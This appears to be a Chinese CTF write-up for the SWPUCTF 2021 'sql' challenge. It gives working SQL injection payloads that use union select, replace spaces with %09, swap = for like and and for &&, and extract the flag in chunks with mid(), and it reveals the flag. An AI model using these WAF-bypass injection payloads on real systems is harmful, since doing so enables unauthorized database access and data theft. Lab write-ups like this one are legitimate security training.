当前位置: 首页 > news >正文

NSS [SWPUCTF 2021 新生赛]sql

NSS [SWPUCTF 2021 新生赛]sql

很明显是sql,有waf。

image-20230623190517786

参数是wllm

image-20230623190537029

get型传参,有回显,单引号闭合,回显位3

image-20230623190746446

跑个fuzz看看waf

image-20230623191147064

过滤了空格 = and 报错注入

空格->%09
=->like
and->&&
爆库:test_db
-1%27union%09select%091,database(),3%23
获取:
-1%27union%09select%091,2,flag%09from%09LTLT_flag%23

长度被限制了

image-20230623192627470

还有mid可用

mid(str,start,[length])
str:截取的字符串  start:起始位置  length:截取的长度,可以忽略
payload:-1%27union%09select%091,2,flag%09from%09LTLT_flag%23
NSSCTF{31d1c108-ddd1-1%27union%09select%091,2,mid(flag,15)%09from%09LTLT_flag%23
8-ddd1-4c12-8896-c02-1%27union%09select%091,2,mid(flag,30)%09from%09LTLT_flag%23
6-c0253d4fa243}

NSSCTF{31d1c108-ddd1-4c12-8896-c0253d4fa243}

http://www.lryc.cn/news/206399.html

相关文章:

  • 【Python机器学习】零基础掌握RandomTreesEmbedding集成学习
  • 【C++基础入门】42.C++中同名覆盖引发的问题
  • 【C++学习笔记】类和对象(上)
  • TinySnippet轻UI组件开发系列教程 — DataGrid选择事件
  • 热搜榜:最热门的话题文本排行榜API接口
  • vue中替换全局字体
  • 【AGC】.p12证书文件如何获取MD5
  • vue2 quill 视频上传 ,基于ruoyi vue,oss
  • YOLOv8改进实战 | 更换损失函数之MPDIOU(2023最新IOU)篇
  • 图的应用1.0-----最小生成树问题
  • 【计算机网络笔记】网络应用对传输服务的需求
  • IDEA启动报错:Command line is too long的解决办法
  • Android 中的 本地广播LocalBroadcastManager
  • 题目 1120: C语言训练-“水仙花数“问题2python详解)——练气三层后期
  • sheng的学习笔记-【中】【吴恩达课后测验】Course 3 - 结构化机器学习项目 - 第二周测验
  • 基于Pytorch的驾驶员分心行为实时检测
  • 【uniapp】小程序开发7:自定义组件、自动注册组件
  • Modbus转MQTT以太网网关MQT-802主要特点和典型应用
  • Go学习第五章——函数与包
  • 【Python 常用脚本及命令系列 5 -- 如何使用 BeautifulSoup 解析CSDN网页表格中的数据】
  • OpenFeign实现分析、源码解析
  • 2023 10月最新Vmd 下载安装教程,WindowsLinux
  • Photoshop(PS)安装教程(图文教程超详细)
  • C++模版进阶
  • CloudCompare
  • 【算法小课堂】深入理解前缀和算法
  • 元对象系统功能
  • 【2024秋招】小米中间件后端开发一面2023-9-13-base武汉
  • SpringMVC Day 01:入门案例
  • docker、docker-compose安装教程,很详细